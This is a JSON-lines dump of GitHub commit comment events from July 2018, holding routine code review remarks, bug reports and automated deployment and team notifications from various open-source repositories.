{"id":"7956915833","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29686810,"position":null,"line":null,"path":null,"commit_id":"3b6950b65afa65d2b4d20590ac51fff24d1605a8","created_at":"2018-07-12T15:15:05Z","updated_at":"2018-07-12T15:15:05Z","author_association":"COLLABORATOR","body":"I didn't notice anything at all. But I'm not sure if I put the RCS on.\r\n\r\nDo the pins on the AJ-60s have a collider that could clip?"}},"created_at":"2018-07-12T15:15:05Z"}
{"id":"7956918209","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29686818,"position":null,"line":null,"path":null,"commit_id":"3d491d5821009901d769f8f22eb3a57b5017f3e9","created_at":"2018-07-12T15:15:28Z","updated_at":"2018-07-12T15:15:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [4-match doesn't register for collapsed candy](https://trello.com/c/drtdnUXg/12-4-match-doesnt-register-for-collapsed-candy)"}},"created_at":"2018-07-12T15:15:28Z"}
{"id":"7956920331","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29686820,"position":null,"line":null,"path":null,"commit_id":"3cefd921a14630b65037dfe852b7fdf8de801dc2","created_at":"2018-07-12T15:15:46Z","updated_at":"2018-07-12T15:15:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-151545 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-151545\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:15:46Z"}
{"id":"7956920485","type":"CommitCommentEvent","actor":{"login":"chbuescher"},"repo":{"name":"collectd/collectd"},"payload":{"comment":{"id":29686821,"position":null,"line":null,"path":null,"commit_id":"1d6c7b046100cbae92df62aa7e50dcf101fa9867","created_at":"2018-07-12T15:15:48Z","updated_at":"2018-07-12T15:15:48Z","author_association":"NONE","body":"This fix - using AIX LPAR statistic values with CPU cycle resolution instead of the CPU statistic values - yields incorrect results, because the unused physical processor ticks have to be added to the idle and wait values. See the lparstat example in the AIX perfstat_partition_total() Interface documentation.\r\nAs an alternative you could use cputotal.idle, cputotal.user, cputotal.sys, cputotal.wait with clock tics resolution."}},"created_at":"2018-07-12T15:15:48Z"}
{"id":"7956920926","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29686822,"position":null,"line":null,"path":null,"commit_id":"3d491d5821009901d769f8f22eb3a57b5017f3e9","created_at":"2018-07-12T15:15:51Z","updated_at":"2018-07-12T15:15:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Sword sprite missing](https://trello.com/c/3jr3zGj1/38-sword-sprite-missing)"}},"created_at":"2018-07-12T15:15:51Z"}
{"id":"7956923592","type":"CommitCommentEvent","actor":{"login":"nathanchance"},"repo":{"name":"nathanchance/op6"},"payload":{"comment":{"id":29686825,"position":10,"line":10,"path":"drivers/param_read_write/param_read_write.c","commit_id":"50eb30ddaa2da42a24326c75eb0385b8eb079395","created_at":"2018-07-12T15:16:17Z","updated_at":"2018-07-12T15:16:17Z","author_association":"OWNER","body":"The user may want to write to it if they don't want the Avengers theme (as dumb as that sounds lol). OnePlus shouldn't ever write to it."}},"created_at":"2018-07-12T15:16:17Z"}
{"id":"7956924903","type":"CommitCommentEvent","actor":{"login":"djwester"},"repo":{"name":"Brightspace/d2l-rubric"},"payload":{"comment":{"id":29686828,"position":5,"line":22,"path":"assessment-result-behavior.html","commit_id":"2df52da70dbbfde58f298b7253a134fb08cdb765","created_at":"2018-07-12T15:16:29Z","updated_at":"2018-07-12T15:16:29Z","author_association":"COLLABORATOR","body":"why are you doing this?  I think it causes issues with polymer 1"}},"created_at":"2018-07-12T15:16:29Z"}
{"id":"7956929250","type":"CommitCommentEvent","actor":{"login":"pityonline"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":29686835,"position":60,"line":46,"path":"translated/tech/20180606 6 Open Source AI Tools to Know.md","commit_id":"b828be613d682d143d030609e38f7ce475ae99bc","created_at":"2018-07-12T15:17:12Z","updated_at":"2018-07-12T15:17:12Z","author_association":"CONTRIBUTOR","body":"@wxy Markdown 分割线标记建议用最少的三个 `---`。一来易写，最短即生效；二来数量多了属于**非必须**，避免有人写的 `-` 数量不一，毕竟数对了不容易。如果是程序自动生成的，建议统一调整成用最短写法。仅供参考。"}},"created_at":"2018-07-12T15:17:12Z"}
{"id":"7956930089","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29686836,"position":12,"line":42,"path":"Vendor.toc","commit_id":"cab74e23aa261cec7bb37bdedf7288c39c28fb96","created_at":"2018-07-12T15:17:19Z","updated_at":"2018-07-12T15:17:19Z","author_association":"COLLABORATOR","body":"I was already planning on doing this, however, I am going to break them apart and rename them so I didn't bother to do it last night. I take it everything was working for you?"}},"created_at":"2018-07-12T15:17:19Z"}
{"id":"7956930981","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyabel-feedstock"},"payload":{"comment":{"id":29686837,"position":null,"line":null,"path":null,"commit_id":"d2d5441270820996476c85c1f7b6d4a9f65bc27e","created_at":"2018-07-12T15:17:27Z","updated_at":"2018-07-12T15:17:27Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @stggh were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @stggh were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-12T15:17:27Z"}
{"id":"7956931905","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29686841,"position":null,"line":null,"path":null,"commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T15:17:36Z","updated_at":"2018-07-12T15:17:36Z","author_association":"CONTRIBUTOR","body":"line 375:\r\ninstead of _\"Any changes you made while being offline which have not yet been synchronized will be lost!\"_ i'd rather suggest something like _\"Any changes you made while having no access to the original/source database which have not yet been synchronized will be lost!\"_"}},"created_at":"2018-07-12T15:17:36Z"}
{"id":"7956933161","type":"CommitCommentEvent","actor":{"login":"octgsoftware"},"repo":{"name":"sudheerj/generator-jhipster-primeng"},"payload":{"comment":{"id":29686842,"position":null,"line":null,"path":null,"commit_id":"f0ca6c059051b59b3797c27271ccf2c06fbe5dea","created_at":"2018-07-12T15:17:48Z","updated_at":"2018-07-12T15:17:48Z","author_association":"NONE","body":"I am getting the following error with a new project created with JHipster 5.1.0.\r\n\r\nWelcome to the JHipster primeng generator! v2.0.54\r\n\r\nError jhipster-primeng \r\n\r\nERROR! This module works only for Angular5...\r\n"}},"created_at":"2018-07-12T15:17:48Z"}
{"id":"7956936516","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29686850,"position":17,"line":217,"path":"gui/CMainWindow.cpp","commit_id":"a727b40dedbe360a2d06566f3d2c51ef46cf6a87","created_at":"2018-07-12T15:18:21Z","updated_at":"2018-07-12T15:18:21Z","author_association":"NONE","body":"@karnikram it seems that there is also a problem here with the indentation"}},"created_at":"2018-07-12T15:18:21Z"}
{"id":"7956938631","type":"CommitCommentEvent","actor":{"login":"djwester"},"repo":{"name":"Brightspace/d2l-rubric"},"payload":{"comment":{"id":29686853,"position":5,"line":22,"path":"assessment-result-behavior.html","commit_id":"2df52da70dbbfde58f298b7253a134fb08cdb765","created_at":"2018-07-12T15:18:42Z","updated_at":"2018-07-12T15:18:42Z","author_association":"COLLABORATOR","body":"nevermind, sorry I thought this was the entity - you are just keeping this as it was before?"}},"created_at":"2018-07-12T15:18:42Z"}
{"id":"7956939594","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29686857,"position":4,"line":95,"path":"test/Common.FunctionalTests/Inprocess/LoggingTests.cs","commit_id":"6a49769452f663fbcdf8d789188c9990f520c263","created_at":"2018-07-12T15:18:52Z","updated_at":"2018-07-12T15:18:52Z","author_association":"CONTRIBUTOR","body":"You should've only skipped them on downlevel IIS not everywhere"}},"created_at":"2018-07-12T15:18:52Z"}
{"id":"7956941974","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29686863,"position":4,"line":95,"path":"test/Common.FunctionalTests/Inprocess/LoggingTests.cs","commit_id":"6a49769452f663fbcdf8d789188c9990f520c263","created_at":"2018-07-12T15:19:16Z","updated_at":"2018-07-12T15:19:16Z","author_association":"CONTRIBUTOR","body":"What's the point of putting into common and then skipping?"}},"created_at":"2018-07-12T15:19:16Z"}
{"id":"7956942730","type":"CommitCommentEvent","actor":{"login":"LickTheCheese"},"repo":{"name":"Elementanium/storerepos"},"payload":{"comment":{"id":29686865,"position":null,"line":null,"path":null,"commit_id":"03730bb8bdd236cd50131ac84ce433df9a979643","created_at":"2018-07-12T15:19:23Z","updated_at":"2018-07-12T15:19:23Z","author_association":"NONE","body":"what store? shine? are you making another app store?\r\n\r\n> lickthecheese ate some cheese."}},"created_at":"2018-07-12T15:19:23Z"}
{"id":"7956946027","type":"CommitCommentEvent","actor":{"login":"emre1702"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29686878,"position":null,"line":null,"path":null,"commit_id":"93625a226154438d5d3cca612dbe088264481e61","created_at":"2018-07-12T15:19:55Z","updated_at":"2018-07-12T15:19:55Z","author_association":"CONTRIBUTOR","body":"@Grafu Read the messages from Dutchman101 in Discord at Tuesday (10.07.)"}},"created_at":"2018-07-12T15:19:55Z"}
{"id":"7956960006","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29686900,"position":null,"line":null,"path":null,"commit_id":"54ddfb878a94ca5e61a1570a240dda5e0e42ebc7","created_at":"2018-07-12T15:22:10Z","updated_at":"2018-07-12T15:22:10Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-152208 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-152208\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:22:10Z"}
{"id":"7956965402","type":"CommitCommentEvent","actor":{"login":"tripwires"},"repo":{"name":"AthenaGaKill/Tripster-Coding-Ex"},"payload":{"comment":{"id":29686912,"position":null,"line":null,"path":null,"commit_id":"d2f811cd2b552eb0d44820781af6f8cdae4b9b9c","created_at":"2018-07-12T15:23:01Z","updated_at":"2018-07-12T15:23:01Z","author_association":"COLLABORATOR","body":"Cool nice to hear. I will close the issue. 👍 "}},"created_at":"2018-07-12T15:23:01Z"}
{"id":"7956969782","type":"CommitCommentEvent","actor":{"login":"prasadakula1"},"repo":{"name":"prasadakula1/waffletest"},"payload":{"comment":{"id":29686919,"position":null,"line":null,"path":null,"commit_id":"2c938a69ca6a05c8954035085f1f76c1848a32e2","created_at":"2018-07-12T15:23:42Z","updated_at":"2018-07-12T15:23:42Z","author_association":"OWNER","body":"closes #12 "}},"created_at":"2018-07-12T15:23:42Z"}
{"id":"7956970009","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29686920,"position":null,"line":null,"path":null,"commit_id":"c806ff203f946df1c988861bf844d17e3a30fa97","created_at":"2018-07-12T15:23:44Z","updated_at":"2018-07-12T15:23:44Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-152342 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-152342\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:23:44Z"}
{"id":"7956973998","type":"CommitCommentEvent","actor":{"login":"jan-zmeskal"},"repo":{"name":"grafuls/disruption_generator"},"payload":{"comment":{"id":29686925,"position":null,"line":null,"path":null,"commit_id":"3fa83c1e2997a8f31a554390ff5c62b8b3471a95","created_at":"2018-07-12T15:24:21Z","updated_at":"2018-07-12T15:24:21Z","author_association":"COLLABORATOR","body":"Wow, my English is not impressive. :smile: Thank you :+1: "}},"created_at":"2018-07-12T15:24:21Z"}
{"id":"7956979982","type":"CommitCommentEvent","actor":{"login":"tysonwilliams"},"repo":{"name":"snowcoding/Redux-Swapi"},"payload":{"comment":{"id":29686938,"position":12,"line":19,"path":"src/reducers/starWarsReducer.js","commit_id":"8137c33696330db9961a38b7cbaf4b81b538ccde","created_at":"2018-07-12T15:25:15Z","updated_at":"2018-07-12T15:25:15Z","author_association":"NONE","body":"Nice use of spread operator again `...`, also on lines 19, 22, 25 👍 "}},"created_at":"2018-07-12T15:25:15Z"}
{"id":"7956980347","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29686939,"position":null,"line":null,"path":null,"commit_id":"74854d719fff8c4004a4cd2cc3ff9c5b3e01f806","created_at":"2018-07-12T15:25:18Z","updated_at":"2018-07-12T15:25:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-152516 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-152516\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:25:18Z"}
{"id":"7956980863","type":"CommitCommentEvent","actor":{"login":"ilanvoro"},"repo":{"name":"comigo-github/data-collection-scripts"},"payload":{"comment":{"id":29686940,"position":34,"line":25,"path":"data_collection_scripts/test.py","commit_id":"fa8fc7118a6d84a377b430885ad4f5d82d630df2","created_at":"2018-07-12T15:25:23Z","updated_at":"2018-07-12T15:25:23Z","author_association":"COLLABORATOR","body":"as asked before, why do you add the '.csv'? if input_A is a csv file then why you need to add it to the name?"}},"created_at":"2018-07-12T15:25:23Z"}
{"id":"7956989865","type":"CommitCommentEvent","actor":{"login":"ilanvoro"},"repo":{"name":"comigo-github/data-collection-scripts"},"payload":{"comment":{"id":29686954,"position":42,"line":33,"path":"data_collection_scripts/test.py","commit_id":"fa8fc7118a6d84a377b430885ad4f5d82d630df2","created_at":"2018-07-12T15:26:48Z","updated_at":"2018-07-12T15:26:48Z","author_association":"COLLABORATOR","body":"how do you know that these are the headers? shouldn't it be all sort of CSVs?"}},"created_at":"2018-07-12T15:26:48Z"}
{"id":"7956993530","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29686962,"position":null,"line":null,"path":null,"commit_id":"500e0db3ed1c92bde5ff88c2dfd6f2f6215736c6","created_at":"2018-07-12T15:27:25Z","updated_at":"2018-07-12T15:27:25Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-44](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-44).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-44-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T15:27:25Z"}
{"id":"7956995027","type":"CommitCommentEvent","actor":{"login":"adegroote"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29686968,"position":null,"line":null,"path":null,"commit_id":"96148a63415517c9edfaeea14e62e1be7dd0f20c","created_at":"2018-07-12T15:27:40Z","updated_at":"2018-07-12T15:27:40Z","author_association":"CONTRIBUTOR","body":"Thanks a lot for that.  By chance, do you try the GPU backend of Bullet 3 ?"}},"created_at":"2018-07-12T15:27:40Z"}
{"id":"7957004940","type":"CommitCommentEvent","actor":{"login":"olexp"},"repo":{"name":"ZF-Commons/ZfcUserDoctrineORM"},"payload":{"comment":{"id":29686990,"position":null,"line":null,"path":null,"commit_id":"6ca0c2eb3b11bfb6437ac90c55e55f8e675caf4a","created_at":"2018-07-12T15:29:17Z","updated_at":"2018-07-12T15:29:17Z","author_association":"NONE","body":"Isn't it better to directly implement ZfcUser\\Mapper\\UserInterface and not extend from ZfcUserMapper? So insert() and update() can have only $entity argument.\r\nEvents are not used in this class so extending from ZfcUser\\EventManager\\EventProvider can be ignored."}},"created_at":"2018-07-12T15:29:17Z"}
{"id":"7957007623","type":"CommitCommentEvent","actor":{"login":"HolyWu"},"repo":{"name":"HomeOfVapourSynthEvolution/havsfunc"},"payload":{"comment":{"id":29686993,"position":null,"line":null,"path":null,"commit_id":"d58d68134934dfc49153116c4edc1ab46e333877","created_at":"2018-07-12T15:29:43Z","updated_at":"2018-07-12T15:29:43Z","author_association":"MEMBER","body":"Sorry, I don't have a copy of it anymore."}},"created_at":"2018-07-12T15:29:43Z"}
{"id":"7957013936","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29687006,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-12T15:30:43Z","updated_at":"2018-07-12T15:30:43Z","author_association":"MEMBER","body":"That would be unfortunate. Kind of exploitable issue in survival servers."}},"created_at":"2018-07-12T15:30:43Z"}
{"id":"7957014699","type":"CommitCommentEvent","actor":{"login":"NomiRizwan"},"repo":{"name":"smarteist/android-image-slider"},"payload":{"comment":{"id":29687007,"position":null,"line":null,"path":null,"commit_id":"1984a9e7e406cf2088de55e1c73ddc221f8d5002","created_at":"2018-07-12T15:30:51Z","updated_at":"2018-07-12T15:30:51Z","author_association":"NONE","body":"hi thanks for nice work, but i have done the steps you said but the sliderview remain blank/white, i have also try to load images from drawable but same result. can you help me. thanks"}},"created_at":"2018-07-12T15:30:51Z"}
{"id":"7957017435","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29687012,"position":null,"line":null,"path":null,"commit_id":"e19a3c36e734265f3951abccdf1ff7f15e74c7e7","created_at":"2018-07-12T15:31:17Z","updated_at":"2018-07-12T15:31:17Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-153116 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-153116\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:31:17Z"}
{"id":"7957018081","type":"CommitCommentEvent","actor":{"login":"WuSicheng54321"},"repo":{"name":"WuSicheng54321/design-pattern"},"payload":{"comment":{"id":29687013,"position":6,"line":30,"path":"src/main/java/com/wusicheng/e26_command_pattern/nevv/Invoker.java","commit_id":"9bee18c298a97445273e6bf9f499c58b99d82ba8","created_at":"2018-07-12T15:31:24Z","updated_at":"2018-07-12T15:31:24Z","author_association":"OWNER","body":"github上的代码审核，可以进行code_review"}},"created_at":"2018-07-12T15:31:24Z"}
{"id":"7957019654","type":"CommitCommentEvent","actor":{"login":"iptq"},"repo":{"name":"minnehack/minnehack.github.io"},"payload":{"comment":{"id":29687018,"position":null,"line":null,"path":null,"commit_id":"9a8ebf176edd82c9a64838a1dbcda504f9988c14","created_at":"2018-07-12T15:31:38Z","updated_at":"2018-07-12T15:31:38Z","author_association":"COLLABORATOR","body":"yby"}},"created_at":"2018-07-12T15:31:38Z"}
{"id":"7957023406","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/lp_solve-feedstock"},"payload":{"comment":{"id":29687031,"position":null,"line":null,"path":null,"commit_id":"7c5048251537c58a1d85c3a3ee1bbef4d701b5be","created_at":"2018-07-12T15:32:14Z","updated_at":"2018-07-12T15:32:14Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mictadlo were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @mictadlo were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-12T15:32:14Z"}
{"id":"7957026330","type":"CommitCommentEvent","actor":{"login":"ExtraConcentratedJuice"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29687036,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T15:32:41Z","updated_at":"2018-07-12T15:32:41Z","author_association":"OWNER","body":"how strange\r\n\r\ncan you paste your config?"}},"created_at":"2018-07-12T15:32:41Z"}
{"id":"7957033959","type":"CommitCommentEvent","actor":{"login":"alexandergoncharov"},"repo":{"name":"Microsoft/react-native-code-push"},"payload":{"comment":{"id":29687052,"position":null,"line":null,"path":null,"commit_id":"0daa647c5c614d81dcfff53898e0ad8feea4b20d","created_at":"2018-07-12T15:33:55Z","updated_at":"2018-07-12T15:33:55Z","author_association":"MEMBER","body":"Hi @santoshgistto ,\r\n\r\nThanks! Good catch! Opened PR for this: https://github.com/MicrosoftDocs/appcenter-docs/pull/215"}},"created_at":"2018-07-12T15:33:55Z"}
{"id":"7957040192","type":"CommitCommentEvent","actor":{"login":"blackjid"},"repo":{"name":"platanus/elastic-rails"},"payload":{"comment":{"id":29687068,"position":5,"line":53,"path":"lib/elastic/configuration.rb","commit_id":"9878ffa055718955a50bec1b4936269ac05ca7b9","created_at":"2018-07-12T15:34:55Z","updated_at":"2018-07-12T15:34:55Z","author_association":"MEMBER","body":"no te falto poner `url:`??"}},"created_at":"2018-07-12T15:34:55Z"}
{"id":"7957044270","type":"CommitCommentEvent","actor":{"login":"adamjson"},"repo":{"name":"grigaman/selenium"},"payload":{"comment":{"id":29687077,"position":null,"line":null,"path":null,"commit_id":"759fa37aabb37072af59b075d48e6728eae8b5f8","created_at":"2018-07-12T15:35:33Z","updated_at":"2018-07-12T15:35:33Z","author_association":"NONE","body":"I think setting retryOnConnectionFailure is going to mask any real issues, and may cause even more problems. This commit was made in an attempt to fix issue #6025, however the stacktrace in that ticket indicates that the problem happens during reading a response. For example, if a POST request (like clicking an element) succeeds server side, but reading the response fails for some reason and the POST is then retried, the element will be clicked twice, or fail to be clicked a second time and return an exception. "}},"created_at":"2018-07-12T15:35:33Z"}
{"id":"7957046918","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29687080,"position":26,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/backend/parser.d","commit_id":"f443125fbc4ab8c68b7e92c0a92eed80bd8fa140","created_at":"2018-07-12T15:35:59Z","updated_at":"2018-07-12T15:35:59Z","author_association":"OWNER","body":"Maybe add a logger.warning to be able to see what failed?\n`logger.warning(e.msg)`\ne is the exception"}},"created_at":"2018-07-12T15:35:59Z"}
{"id":"7957047317","type":"CommitCommentEvent","actor":{"login":"tmbb"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687081,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T15:36:04Z","updated_at":"2018-07-12T15:36:04Z","author_association":"CONTRIBUTOR","body":"Is this an attempt to make it more similar to the old theme? If so, I believe you can work with someone to help keep the old look and feel but without sacrificing these distinctions."}},"created_at":"2018-07-12T15:36:04Z"}
{"id":"7957049852","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"ProtonMail/go-imap"},"payload":{"comment":{"id":29687092,"position":null,"line":null,"path":null,"commit_id":"db0b5b9852b9f0f3485f7ac1355931cc48dc3cd9","created_at":"2018-07-12T15:36:28Z","updated_at":"2018-07-12T15:36:28Z","author_association":"NONE","body":"Hi, is it possible to have a bug report to be able to get this bug properly fixed in upstream? Thanks."}},"created_at":"2018-07-12T15:36:28Z"}
{"id":"7957052792","type":"CommitCommentEvent","actor":{"login":"spa-simone"},"repo":{"name":"bbc/webpack-s3-uploader"},"payload":{"comment":{"id":29687099,"position":4,"line":6,"path":"package.json","commit_id":"a9bcd3e7a71b420aac84b0d7466dd1e85757d26a","created_at":"2018-07-12T15:36:55Z","updated_at":"2018-07-12T15:36:55Z","author_association":"MEMBER","body":"If your entrypoint is `webpack-s3-uploader.js` you should point directly to `src/webpack-s3-uploader.js`"}},"created_at":"2018-07-12T15:36:55Z"}
{"id":"7957056562","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29687107,"position":null,"line":null,"path":null,"commit_id":"7eb3ac8ae68ff1b4599cfcba0c3d29cf39b78d39","created_at":"2018-07-12T15:37:32Z","updated_at":"2018-07-12T15:37:32Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-42](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-42-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T15:37:32Z"}
